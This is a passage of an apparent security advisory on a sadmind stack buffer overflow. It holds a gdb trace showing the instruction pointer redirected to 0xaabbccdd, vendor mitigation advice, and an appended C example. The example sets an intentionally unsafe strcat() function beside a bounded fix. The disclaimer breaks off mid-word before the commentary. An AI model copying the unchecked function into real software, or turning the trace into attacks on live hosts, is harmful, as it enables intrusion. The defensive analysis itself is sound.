0x8041208:   "system.2.1/"
(gdb) where
#0  0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
#1  0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2
#2  0xd335326b in verify_vers_1 () from /usr/snadm/lib/libadmagt.so.2
#3  0xd3352e88 in verify_validate () from /usr/snadm/lib/libadmagt.so.2
#4  0xd3352cf8 in amsl_verify () from /usr/snadm/lib/libadmagt.so.2
#5  0xd32c8a85 in __0fQNetmgtDispatcherPdispatchRequestP6Hsvc_reqP6J__svcxprt
() from /usr/snadm/lib/libadmcom.so.2
#6  0xd32c8656 in __0fQNetmgtDispatcherOreceiveRequestP6Hsvc_reqP6J__svcxprt ()
   from /usr/snadm/lib/libadmcom.so.2
#7  0xd32c837c in _netmgt_receiveRequest () from /usr/snadm/lib/libadmcom.so.2
#8  0xd311d4a3 in _svc_prog_dispatch () from /usr/lib/libnsl.so.1
#9  0xd311d24e in svc_getreq_common () from /usr/lib/libnsl.so.1
#10 0xd311d130 in svc_getreq_poll () from /usr/lib/libnsl.so.1
#11 0xd3121550 in _svc_run () from /usr/lib/libnsl.so.1
#12 0xd3121293 in svc_run () from /usr/lib/libnsl.so.1
#13 0xd32cd165 in __0fQNetmgtDispatcherNstartupServerv ()
   from /usr/snadm/lib/libadmcom.so.2
#14 0xd32cd13b in netmgt_start_agent () from /usr/snadm/lib/libadmcom.so.2
#15 0x0805168f in main ()
(gdb) stepi
0xd3304fa8 in [EMAIL PROTECTED] () from /usr/snadm/lib/libadmapm.so.2
(gdb) step
Single stepping until exit from function [EMAIL PROTECTED], 
which has no line number information.
0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc
0xd330e5cb : add$0x8,%esp
(gdb) where
#0  0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
#1  0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2
#2  0xaabbccdd in ?? ()
#3  0x08063000 in ?? ()
#4  0x08063128 in ?? ()
#5  0x080b7cd0 in ?? ()
#6  0x08041730 in ?? ()
#7  0x0400 in ?? ()
#8  0x0001 in ?? ()
#9  0xd336ac8c in ?? () from /usr/snadm/lib/libadmagt.so.2
#10 0x in ?? ()
(gdb) c
Continuing.

Breakpoint 1, 0xd330e5b0 in adm_build_path ()
   from /usr/snadm/lib/libadmapm.so.2
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xaabbccdd in ?? ()
(gdb) 


A proof of concept code for this vulnerability can be downloaded from our 
website http://risesecurity.org/.

VENDOR

Sun Security Coordination Team was notified of this issue, proper corrections
should be available soon. Meanwhile, we recommend disabling the distributed
system administration daemon (sadmind).

CREDITS

This vulnerability was discovered by Adriano Lima <[EMAIL PROTECTED]>.

DISCLAIMER

The authors reserve the right not to be responsible for the topicality, 
correctness, completeness or quality of the information provided in this 
document. Liab
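The DETAILS section describes the bug class precisely: user-supplied data appended with strcat() into a fixed-size stack buffer, with nothing telling strcat() how much room is left. The following is an added example, not sadmind's code, showing that shape beside the bounded form a reviewer would ask for. The function names, the 64-byte buffer size and the "get_info" method name are constructed for the example; "system.2.1/" is the directory string visible in the gdb session above.

```c
/* Added example (not sadmind's code): the unchecked strcat() pattern the
 * advisory describes, beside a bounded version that refuses oversized input.
 * Names, PATH_BUF_SIZE and the "get_info" method name are constructed. */
#include <stdio.h>
#include <string.h>

#define PATH_BUF_SIZE 64   /* constructed; the real stack buffer size is not on the page */

/* The vulnerable shape: the caller hands over a fixed-size stack buffer and the
 * function appends externally supplied data with strcat(), which never learns
 * the buffer's size. Kept for contrast; main() calls it only with short input. */
void build_path_unchecked(char *out, const char *dir, const char *method)
{
    strcpy(out, dir);
    strcat(out, method);   /* overruns `out` as soon as dir + method + NUL exceeds its size */
}

/* Hardened shape: the buffer size travels with the buffer, the required length is
 * computed before any byte is written, and input that does not fit is rejected
 * outright rather than silently truncated (a truncated path could name the wrong
 * file). Returns 0 on success, -1 when the result would not fit. */
int build_path_checked(char *out, size_t out_sz, const char *dir, const char *method)
{
    size_t dlen = strlen(dir), mlen = strlen(method);
    /* Comparisons are arranged so that dlen + mlen can never wrap around. */
    if (out_sz == 0 || dlen > out_sz - 1 || mlen > out_sz - 1 - dlen)
        return -1;
    memcpy(out, dir, dlen);
    memcpy(out + dlen, method, mlen + 1);   /* +1 copies the terminating NUL */
    return 0;
}

/* Normal input fits and produces the expected path. */
int demo_checked_ok(void)
{
    char buf[PATH_BUF_SIZE];
    return build_path_checked(buf, sizeof buf, "system.2.1/", "get_info") == 0
        && strcmp(buf, "system.2.1/get_info") == 0;
}

/* Oversized input (a 100-byte run of 'A', like the string in the debug session)
 * is refused and the buffer is left untouched instead of being overrun. */
int demo_checked_rejects_long(void)
{
    char method[101];
    memset(method, 'A', 100);
    method[100] = '\0';
    char buf[PATH_BUF_SIZE] = "untouched";
    return build_path_checked(buf, sizeof buf, "system.2.1/", method) == -1
        && strcmp(buf, "untouched") == 0;
}

/* Boundary: dir + method of exactly out_sz - 1 bytes is accepted; one more byte is not. */
int demo_checked_boundary(void)
{
    char buf[PATH_BUF_SIZE];
    char method[PATH_BUF_SIZE];
    size_t dlen = strlen("system.2.1/");
    memset(method, 'm', sizeof method);
    method[PATH_BUF_SIZE - 1 - dlen] = '\0';      /* fills the buffer exactly */
    int fits = build_path_checked(buf, sizeof buf, "system.2.1/", method);
    method[PATH_BUF_SIZE - 1 - dlen] = 'm';
    method[PATH_BUF_SIZE - dlen] = '\0';          /* one byte too many */
    int refused = build_path_checked(buf, sizeof buf, "system.2.1/", method);
    return fits == 0 && strlen(buf) == PATH_BUF_SIZE - 1 && refused == -1;
}

int main(void)
{
    char buf[PATH_BUF_SIZE];
    build_path_unchecked(buf, "system.2.1/", "get_info");   /* short input only */
    printf("unchecked: %s\n", buf);
    printf("checked ok: %d, rejects long: %d, boundary: %d\n",
           demo_checked_ok(), demo_checked_rejects_long(), demo_checked_boundary());
    return 0;
}
```

The design choice worth noting is the failure mode: the checked version returns an error rather than truncating with strncat()-style calls, because a path silently cut short is itself a security problem in a daemon that goes on to open or execute what the path names.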